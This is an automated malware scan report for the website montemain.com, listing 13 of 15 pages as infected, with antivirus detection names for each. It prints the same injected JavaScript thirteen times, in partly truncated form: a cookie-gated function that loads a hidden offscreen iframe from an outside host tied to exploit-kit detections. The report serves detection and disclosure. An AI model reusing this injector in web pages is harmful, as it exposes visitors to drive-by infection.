New scan:

Malware Scanner report for montemain.com

Malicious/Suspicious/Total urls checked
13/0/15
13 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "montemain.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=montemain.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.montemain.com/
200 OK
Content-Length: 14420
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function bipq09() { var static='ajax'; var controller='index.php'; var bipq = document.createElement('iframe'); bipq.src = 'http://outreachcare.com/wp-admin/rG3JfWcX.php'; bipq.style.position = 'absolute'; bipq.style.color = '1191'; bipq.style.height = '1191px'; bipq.style.width = '1191px'; bipq.style.left = '10001191'; bipq.style.top = '10001191'; if (!document.getElementById('bipq')) { document.write('<p id=\'bipq\' class=\'bipq09\' ></p>'); document.getElementById('bipq').appendCh
... 353 bytes are skipped ...
name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');bipq09();}}

Antivirus reports:

AntiVir
HTML/ExpKit.Gen3
Avast
JS:Includer-AJE [Trj]
Ad-Aware
JS:Trojan.Script.CIV
Ikarus
Trojan.JS.Quidvetis
nProtect
JS:Trojan.Script.CIV
K7AntiVirus
Riskware ( 885143830 )
TrendMicro-HouseCall
TROJ_GEN.F47V1231
Emsisoft
JS:Trojan.Script.CIV (B)
Comodo
UnclassifiedMalware
K7GW
Riskware ( 885143830 )
McAfee-GW-Edition
JS/Redirector.bc
Microsoft
Trojan:JS/Quidvetis.A
Kaspersky
Trojan-Downloader.JS.Iframe.dfm
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Blacole.EU!tr.dldr
McAfee
JS/Redirector.bc
NANO-Antivirus
Trojan.Script.Iframe.bopaxv
F-Secure
JS:Trojan.Script.CIV
F-Prot
JS/IFrame.RS.gen
Norman
Iframer.BI
Sophos
Troj/JSRedir-MB
GData
JS:Trojan.Script.CIV
Commtouch
JS/IFrame.RS.gen
BitDefender
JS:Trojan.Script.CIV

http://www.montemain.com/wp-content/plugins/cforms/js/cforms.js
200 OK
Content-Length: 17306
Content-Type: application/javascript
clean
http://www.montemain.com/category/leadership
200 OK
Content-Length: 11290
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function bipq09() { var static='ajax'; var controller='index.php'; var bipq = document.createElement('iframe'); bipq.src = 'http://outreachcare.com/wp-admin/rG3JfWcX.php'; bipq.style.position = 'absolute'; bipq.style.color = '1191'; bipq.style.height = '1191px'; bipq.style.width = '1191px'; bipq.style.left = '10001191'; bipq.style.top = '10001191'; if (!document.getElementById('bipq')) { document.write('<p id=\'bipq\' class=\'bipq09\' ></p>'); document.getElementById('bipq').appendCh
... 353 bytes are skipped ...
name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');bipq09();}}

Antivirus reports:

AntiVir
HTML/ExpKit.Gen3
Avast
JS:Includer-AJE [Trj]
Ad-Aware
JS:Trojan.Script.CIV
Ikarus
Trojan.JS.Quidvetis
nProtect
JS:Trojan.Script.CIV
K7AntiVirus
Riskware ( 885143830 )
TrendMicro-HouseCall
TROJ_GEN.F47V1231
Emsisoft
JS:Trojan.Script.CIV (B)
Comodo
UnclassifiedMalware
K7GW
Riskware ( 885143830 )
McAfee-GW-Edition
JS/Redirector.bc
Microsoft
Trojan:JS/Quidvetis.A
Kaspersky
Trojan-Downloader.JS.Iframe.dfm
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Blacole.EU!tr.dldr
McAfee
JS/Redirector.bc
NANO-Antivirus
Trojan.Script.Iframe.bopaxv
F-Secure
JS:Trojan.Script.CIV
F-Prot
JS/IFrame.RS.gen
Norman
Iframer.BI
Sophos
Troj/JSRedir-MB
GData
JS:Trojan.Script.CIV
Commtouch
JS/IFrame.RS.gen
BitDefender
JS:Trojan.Script.CIV

http://www.montemain.com/category/marketing
200 OK
Content-Length: 12227
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function bipq09() { var static='ajax'; var controller='index.php'; var bipq = document.createElement('iframe'); bipq.src = 'http://outreachcare.com/wp-admin/rG3JfWcX.php'; bipq.style.position = 'absolute'; bipq.style.color = '1191'; bipq.style.height = '1191px'; bipq.style.width = '1191px'; bipq.style.left = '10001191'; bipq.style.top = '10001191'; if (!document.getElementById('bipq')) { document.write('<p id=\'bipq\' class=\'bipq09\' ></p>'); document.getElementById('bipq').appendCh
... 353 bytes are skipped ...
name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');bipq09();}}

Antivirus reports:

AntiVir
HTML/ExpKit.Gen3
Avast
JS:Includer-AJE [Trj]
Ad-Aware
JS:Trojan.Script.CIV
Ikarus
Trojan.JS.Quidvetis
nProtect
JS:Trojan.Script.CIV
K7AntiVirus
Riskware ( 885143830 )
TrendMicro-HouseCall
TROJ_GEN.F47V1231
Emsisoft
JS:Trojan.Script.CIV (B)
Comodo
UnclassifiedMalware
K7GW
Riskware ( 885143830 )
McAfee-GW-Edition
JS/Redirector.bc
Microsoft
Trojan:JS/Quidvetis.A
Kaspersky
Trojan-Downloader.JS.Iframe.dfm
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Blacole.EU!tr.dldr
McAfee
JS/Redirector.bc
NANO-Antivirus
Trojan.Script.Iframe.bopaxv
F-Secure
JS:Trojan.Script.CIV
F-Prot
JS/IFrame.RS.gen
Norman
Iframer.BI
Sophos
Troj/JSRedir-MB
GData
JS:Trojan.Script.CIV
Commtouch
JS/IFrame.RS.gen
BitDefender
JS:Trojan.Script.CIV

http://www.montemain.com/category/technology
200 OK
Content-Length: 12433
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function bipq09() { var static='ajax'; var controller='index.php'; var bipq = document.createElement('iframe'); bipq.src = 'http://outreachcare.com/wp-admin/rG3JfWcX.php'; bipq.style.position = 'absolute'; bipq.style.color = '1191'; bipq.style.height = '1191px'; bipq.style.width = '1191px'; bipq.style.left = '10001191'; bipq.style.top = '10001191'; if (!document.getElementById('bipq')) { document.write('<p id=\'bipq\' class=\'bipq09\' ></p>'); document.getElementById('bipq').appendCh
... 353 bytes are skipped ...
name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');bipq09();}}

Antivirus reports:

AntiVir
HTML/ExpKit.Gen3
Avast
JS:Includer-AJE [Trj]
Ad-Aware
JS:Trojan.Script.CIV
Ikarus
Trojan.JS.Quidvetis
nProtect
JS:Trojan.Script.CIV
K7AntiVirus
Riskware ( 885143830 )
TrendMicro-HouseCall
TROJ_GEN.F47V1231
Emsisoft
JS:Trojan.Script.CIV (B)
Comodo
UnclassifiedMalware
K7GW
Riskware ( 885143830 )
McAfee-GW-Edition
JS/Redirector.bc
Microsoft
Trojan:JS/Quidvetis.A
Kaspersky
Trojan-Downloader.JS.Iframe.dfm
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Blacole.EU!tr.dldr
McAfee
JS/Redirector.bc
NANO-Antivirus
Trojan.Script.Iframe.bopaxv
F-Secure
JS:Trojan.Script.CIV
F-Prot
JS/IFrame.RS.gen
Norman
Iframer.BI
Sophos
Troj/JSRedir-MB
GData
JS:Trojan.Script.CIV
Commtouch
JS/IFrame.RS.gen
BitDefender
JS:Trojan.Script.CIV

http://www.montemain.com/about
200 OK
Content-Length: 10700
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function bipq09() { var static='ajax'; var controller='index.php'; var bipq = document.createElement('iframe'); bipq.src = 'http://outreachcare.com/wp-admin/rG3JfWcX.php'; bipq.style.position = 'absolute'; bipq.style.color = '1191'; bipq.style.height = '1191px'; bipq.style.width = '1191px'; bipq.style.left = '10001191'; bipq.style.top = '10001191'; if (!document.getElementById('bipq')) { document.write('<p id=\'bipq\' class=\'bipq09\' ></p>'); document.getElementById('bipq').appendCh
... 353 bytes are skipped ...
name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');bipq09();}}

Antivirus reports:

AntiVir
HTML/ExpKit.Gen3
Avast
JS:Includer-AJE [Trj]
Ad-Aware
JS:Trojan.Script.CIV
Ikarus
Trojan.JS.Quidvetis
nProtect
JS:Trojan.Script.CIV
K7AntiVirus
Riskware ( 885143830 )
TrendMicro-HouseCall
TROJ_GEN.F47V1231
Emsisoft
JS:Trojan.Script.CIV (B)
Comodo
UnclassifiedMalware
K7GW
Riskware ( 885143830 )
McAfee-GW-Edition
JS/Redirector.bc
Microsoft
Trojan:JS/Quidvetis.A
Kaspersky
Trojan-Downloader.JS.Iframe.dfm
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Blacole.EU!tr.dldr
McAfee
JS/Redirector.bc
NANO-Antivirus
Trojan.Script.Iframe.bopaxv
F-Secure
JS:Trojan.Script.CIV
F-Prot
JS/IFrame.RS.gen
Norman
Iframer.BI
Sophos
Troj/JSRedir-MB
GData
JS:Trojan.Script.CIV
Commtouch
JS/IFrame.RS.gen
BitDefender
JS:Trojan.Script.CIV

http://www.montemain.com/wp-includes/js/comment-reply.js?ver=20090102
200 OK
Content-Length: 786
Content-Type: application/javascript
clean
http://www.montemain.com/contact
200 OK
Content-Length: 11722
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function bipq09() { var static='ajax'; var controller='index.php'; var bipq = document.createElement('iframe'); bipq.src = 'http://outreachcare.com/wp-admin/rG3JfWcX.php'; bipq.style.position = 'absolute'; bipq.style.color = '1191'; bipq.style.height = '1191px'; bipq.style.width = '1191px'; bipq.style.left = '10001191'; bipq.style.top = '10001191'; if (!document.getElementById('bipq')) { document.write('<p id=\'bipq\' class=\'bipq09\' ></p>'); document.getElementById('bipq').appendCh
... 353 bytes are skipped ...
name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');bipq09();}}

Antivirus reports:

AntiVir
HTML/ExpKit.Gen3
Avast
JS:Includer-AJE [Trj]
Ad-Aware
JS:Trojan.Script.CIV
Ikarus
Trojan.JS.Quidvetis
nProtect
JS:Trojan.Script.CIV
K7AntiVirus
Riskware ( 885143830 )
TrendMicro-HouseCall
TROJ_GEN.F47V1231
Emsisoft
JS:Trojan.Script.CIV (B)
Comodo
UnclassifiedMalware
K7GW
Riskware ( 885143830 )
McAfee-GW-Edition
JS/Redirector.bc
Microsoft
Trojan:JS/Quidvetis.A
Kaspersky
Trojan-Downloader.JS.Iframe.dfm
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Blacole.EU!tr.dldr
McAfee
JS/Redirector.bc
NANO-Antivirus
Trojan.Script.Iframe.bopaxv
F-Secure
JS:Trojan.Script.CIV
F-Prot
JS/IFrame.RS.gen
Norman
Iframer.BI
Sophos
Troj/JSRedir-MB
GData
JS:Trojan.Script.CIV
Commtouch
JS/IFrame.RS.gen
BitDefender
JS:Trojan.Script.CIV

http://www.montemain.com/zen-and-the-art-of-software-maintenance
200 OK
Content-Length: 21633
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function bipq09() { var static='ajax'; var controller='index.php'; var bipq = document.createElement('iframe'); bipq.src = 'http://outreachcare.com/wp-admin/rG3JfWcX.php'; bipq.style.position = 'absolute'; bipq.style.color = '1191'; bipq.style.height = '1191px'; bipq.style.width = '1191px'; bipq.style.left = '10001191'; bipq.style.top = '10001191'; if (!document.getElementById('bipq')) { document.write('<p id=\'bipq\' class=\'bipq09\' ></p>'); document.getElementById('bipq').appendCh
... 353 bytes are skipped ...
name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');bipq09();}}

Antivirus reports:

AntiVir
HTML/ExpKit.Gen3
Avast
JS:Includer-AJE [Trj]
Ad-Aware
JS:Trojan.Script.CIV
Ikarus
Trojan.JS.Quidvetis
nProtect
JS:Trojan.Script.CIV
K7AntiVirus
Riskware ( 885143830 )
TrendMicro-HouseCall
TROJ_GEN.F47V1231
Emsisoft
JS:Trojan.Script.CIV (B)
Comodo
UnclassifiedMalware
K7GW
Riskware ( 885143830 )
McAfee-GW-Edition
JS/Redirector.bc
Microsoft
Trojan:JS/Quidvetis.A
Kaspersky
Trojan-Downloader.JS.Iframe.dfm
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Blacole.EU!tr.dldr
McAfee
JS/Redirector.bc
NANO-Antivirus
Trojan.Script.Iframe.bopaxv
F-Secure
JS:Trojan.Script.CIV
F-Prot
JS/IFrame.RS.gen
Norman
Iframer.BI
Sophos
Troj/JSRedir-MB
GData
JS:Trojan.Script.CIV
Commtouch
JS/IFrame.RS.gen
BitDefender
JS:Trojan.Script.CIV

http://www.montemain.com/the-cure-for-unemployment
200 OK
Content-Length: 24511
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function bipq09() { var static='ajax'; var controller='index.php'; var bipq = document.createElement('iframe'); bipq.src = 'http://outreachcare.com/wp-admin/rG3JfWcX.php'; bipq.style.position = 'absolute'; bipq.style.color = '1191'; bipq.style.height = '1191px'; bipq.style.width = '1191px'; bipq.style.left = '10001191'; bipq.style.top = '10001191'; if (!document.getElementById('bipq')) { document.write('<p id=\'bipq\' class=\'bipq09\' ></p>'); document.getElementById('bipq').appendCh
... 353 bytes are skipped ...
name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');bipq09();}}

Antivirus reports:

AntiVir
HTML/ExpKit.Gen3
Avast
JS:Includer-AJE [Trj]
Ad-Aware
JS:Trojan.Script.CIV
Ikarus
Trojan.JS.Quidvetis
nProtect
JS:Trojan.Script.CIV
K7AntiVirus
Riskware ( 885143830 )
TrendMicro-HouseCall
TROJ_GEN.F47V1231
Emsisoft
JS:Trojan.Script.CIV (B)
Comodo
UnclassifiedMalware
K7GW
Riskware ( 885143830 )
McAfee-GW-Edition
JS/Redirector.bc
Microsoft
Trojan:JS/Quidvetis.A
Kaspersky
Trojan-Downloader.JS.Iframe.dfm
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Blacole.EU!tr.dldr
McAfee
JS/Redirector.bc
NANO-Antivirus
Trojan.Script.Iframe.bopaxv
F-Secure
JS:Trojan.Script.CIV
F-Prot
JS/IFrame.RS.gen
Norman
Iframer.BI
Sophos
Troj/JSRedir-MB
GData
JS:Trojan.Script.CIV
Commtouch
JS/IFrame.RS.gen
BitDefender
JS:Trojan.Script.CIV

http://www.montemain.com/what-type-of-manager-are-you
200 OK
Content-Length: 14306
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function bipq09() { var static='ajax'; var controller='index.php'; var bipq = document.createElement('iframe'); bipq.src = 'http://outreachcare.com/wp-admin/rG3JfWcX.php'; bipq.style.position = 'absolute'; bipq.style.color = '1191'; bipq.style.height = '1191px'; bipq.style.width = '1191px'; bipq.style.left = '10001191'; bipq.style.top = '10001191'; if (!document.getElementById('bipq')) { document.write('<p id=\'bipq\' class=\'bipq09\' ></p>'); document.getElementById('bipq').appendCh
... 353 bytes are skipped ...
name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');bipq09();}}

Antivirus reports:

AntiVir
HTML/ExpKit.Gen3
Avast
JS:Includer-AJE [Trj]
Ad-Aware
JS:Trojan.Script.CIV
Ikarus
Trojan.JS.Quidvetis
nProtect
JS:Trojan.Script.CIV
K7AntiVirus
Riskware ( 885143830 )
TrendMicro-HouseCall
TROJ_GEN.F47V1231
Emsisoft
JS:Trojan.Script.CIV (B)
Comodo
UnclassifiedMalware
K7GW
Riskware ( 885143830 )
McAfee-GW-Edition
JS/Redirector.bc
Microsoft
Trojan:JS/Quidvetis.A
Kaspersky
Trojan-Downloader.JS.Iframe.dfm
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Blacole.EU!tr.dldr
McAfee
JS/Redirector.bc
NANO-Antivirus
Trojan.Script.Iframe.bopaxv
F-Secure
JS:Trojan.Script.CIV
F-Prot
JS/IFrame.RS.gen
Norman
Iframer.BI
Sophos
Troj/JSRedir-MB
GData
JS:Trojan.Script.CIV
Commtouch
JS/IFrame.RS.gen
BitDefender
JS:Trojan.Script.CIV

http://www.montemain.com/praise
200 OK
Content-Length: 13616
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function bipq09() { var static='ajax'; var controller='index.php'; var bipq = document.createElement('iframe'); bipq.src = 'http://outreachcare.com/wp-admin/rG3JfWcX.php'; bipq.style.position = 'absolute'; bipq.style.color = '1191'; bipq.style.height = '1191px'; bipq.style.width = '1191px'; bipq.style.left = '10001191'; bipq.style.top = '10001191'; if (!document.getElementById('bipq')) { document.write('<p id=\'bipq\' class=\'bipq09\' ></p>'); document.getElementById('bipq').appendCh
... 353 bytes are skipped ...
name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');bipq09();}}

Antivirus reports:

AntiVir
HTML/ExpKit.Gen3
Avast
JS:Includer-AJE [Trj]
Ad-Aware
JS:Trojan.Script.CIV
Ikarus
Trojan.JS.Quidvetis
nProtect
JS:Trojan.Script.CIV
K7AntiVirus
Riskware ( 885143830 )
TrendMicro-HouseCall
TROJ_GEN.F47V1231
Emsisoft
JS:Trojan.Script.CIV (B)
Comodo
UnclassifiedMalware
K7GW
Riskware ( 885143830 )
McAfee-GW-Edition
JS/Redirector.bc
Microsoft
Trojan:JS/Quidvetis.A
Kaspersky
Trojan-Downloader.JS.Iframe.dfm
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Blacole.EU!tr.dldr
McAfee
JS/Redirector.bc
NANO-Antivirus
Trojan.Script.Iframe.bopaxv
F-Secure
JS:Trojan.Script.CIV
F-Prot
JS/IFrame.RS.gen
Norman
Iframer.BI
Sophos
Troj/JSRedir-MB
GData
JS:Trojan.Script.CIV
Commtouch
JS/IFrame.RS.gen
BitDefender
JS:Trojan.Script.CIV

http://www.montemain.com/understanding-the-complexity-that-is-me
200 OK
Content-Length: 12499
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function bipq09() { var static='ajax'; var controller='index.php'; var bipq = document.createElement('iframe'); bipq.src = 'http://outreachcare.com/wp-admin/rG3JfWcX.php'; bipq.style.position = 'absolute'; bipq.style.color = '1191'; bipq.style.height = '1191px'; bipq.style.width = '1191px'; bipq.style.left = '10001191'; bipq.style.top = '10001191'; if (!document.getElementById('bipq')) { document.write('<p id=\'bipq\' class=\'bipq09\' ></p>'); document.getElementById('bipq').appendCh
... 353 bytes are skipped ...
name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');bipq09();}}

Antivirus reports:

AntiVir
HTML/ExpKit.Gen3
Avast
JS:Includer-AJE [Trj]
Ad-Aware
JS:Trojan.Script.CIV
Ikarus
Trojan.JS.Quidvetis
nProtect
JS:Trojan.Script.CIV
K7AntiVirus
Riskware ( 885143830 )
TrendMicro-HouseCall
TROJ_GEN.F47V1231
Emsisoft
JS:Trojan.Script.CIV (B)
Comodo
UnclassifiedMalware
K7GW
Riskware ( 885143830 )
McAfee-GW-Edition
JS/Redirector.bc
Microsoft
Trojan:JS/Quidvetis.A
Kaspersky
Trojan-Downloader.JS.Iframe.dfm
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Blacole.EU!tr.dldr
McAfee
JS/Redirector.bc
NANO-Antivirus
Trojan.Script.Iframe.bopaxv
F-Secure
JS:Trojan.Script.CIV
F-Prot
JS/IFrame.RS.gen
Norman
Iframer.BI
Sophos
Troj/JSRedir-MB
GData
JS:Trojan.Script.CIV
Commtouch
JS/IFrame.RS.gen
BitDefender
JS:Trojan.Script.CIV

http://www.montemain.com/tag/efficiently
200 OK
Content-Length: 10408
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function bipq09() { var static='ajax'; var controller='index.php'; var bipq = document.createElement('iframe'); bipq.src = 'http://outreachcare.com/wp-admin/rG3JfWcX.php'; bipq.style.position = 'absolute'; bipq.style.color = '1191'; bipq.style.height = '1191px'; bipq.style.width = '1191px'; bipq.style.left = '10001191'; bipq.style.top = '10001191'; if (!document.getElementById('bipq')) { document.write('<p id=\'bipq\' class=\'bipq09\' ></p>'); document.getElementById('bipq').appendCh
... 353 bytes are skipped ...
name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');bipq09();}}

Antivirus reports:

AntiVir
HTML/ExpKit.Gen3
Avast
JS:Includer-AJE [Trj]
Ad-Aware
JS:Trojan.Script.CIV
Ikarus
Trojan.JS.Quidvetis
nProtect
JS:Trojan.Script.CIV
K7AntiVirus
Riskware ( 885143830 )
TrendMicro-HouseCall
TROJ_GEN.F47V1231
Emsisoft
JS:Trojan.Script.CIV (B)
Comodo
UnclassifiedMalware
K7GW
Riskware ( 885143830 )
McAfee-GW-Edition
JS/Redirector.bc
Microsoft
Trojan:JS/Quidvetis.A
Kaspersky
Trojan-Downloader.JS.Iframe.dfm
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Blacole.EU!tr.dldr
McAfee
JS/Redirector.bc
NANO-Antivirus
Trojan.Script.Iframe.bopaxv
F-Secure
JS:Trojan.Script.CIV
F-Prot
JS/IFrame.RS.gen
Norman
Iframer.BI
Sophos
Troj/JSRedir-MB
GData
JS:Trojan.Script.CIV
Commtouch
JS/IFrame.RS.gen
BitDefender
JS:Trojan.Script.CIV

http://www.montemain.com/nothing-says-you-care-like-awesome-code
200 OK
Content-Length: 12576
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function bipq09() { var static='ajax'; var controller='index.php'; var bipq = document.createElement('iframe'); bipq.src = 'http://outreachcare.com/wp-admin/rG3JfWcX.php'; bipq.style.position = 'absolute'; bipq.style.color = '1191'; bipq.style.height = '1191px'; bipq.style.width = '1191px'; bipq.style.left = '10001191'; bipq.style.top = '10001191'; if (!document.getElementById('bipq')) { document.write('<p id=\'bipq\' class=\'bipq09\' ></p>'); document.getElementById('bipq').appendCh
... 353 bytes are skipped ...
name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');bipq09();}}

Antivirus reports:

AntiVir
HTML/ExpKit.Gen3
Avast
JS:Includer-AJE [Trj]
Ad-Aware
JS:Trojan.Script.CIV
Ikarus
Trojan.JS.Quidvetis
nProtect
JS:Trojan.Script.CIV
K7AntiVirus
Riskware ( 885143830 )
TrendMicro-HouseCall
TROJ_GEN.F47V1231
Emsisoft
JS:Trojan.Script.CIV (B)
Comodo
UnclassifiedMalware
K7GW
Riskware ( 885143830 )
McAfee-GW-Edition
JS/Redirector.bc
Microsoft
Trojan:JS/Quidvetis.A
Kaspersky
Trojan-Downloader.JS.Iframe.dfm
MicroWorld-eScan
JS:Trojan.Script.CIV
Fortinet
JS/Blacole.EU!tr.dldr
McAfee
JS/Redirector.bc
NANO-Antivirus
Trojan.Script.Iframe.bopaxv
F-Secure
JS:Trojan.Script.CIV
F-Prot
JS/IFrame.RS.gen
Norman
Iframer.BI
Sophos
Troj/JSRedir-MB
GData
JS:Trojan.Script.CIV
Commtouch
JS/IFrame.RS.gen
BitDefender
JS:Trojan.Script.CIV


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: montemain.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: montemain.com
Referer: http://www.google.com/search?q=montemain.com

Result:
The result is similar to the first query. There are no suspicious redirects found.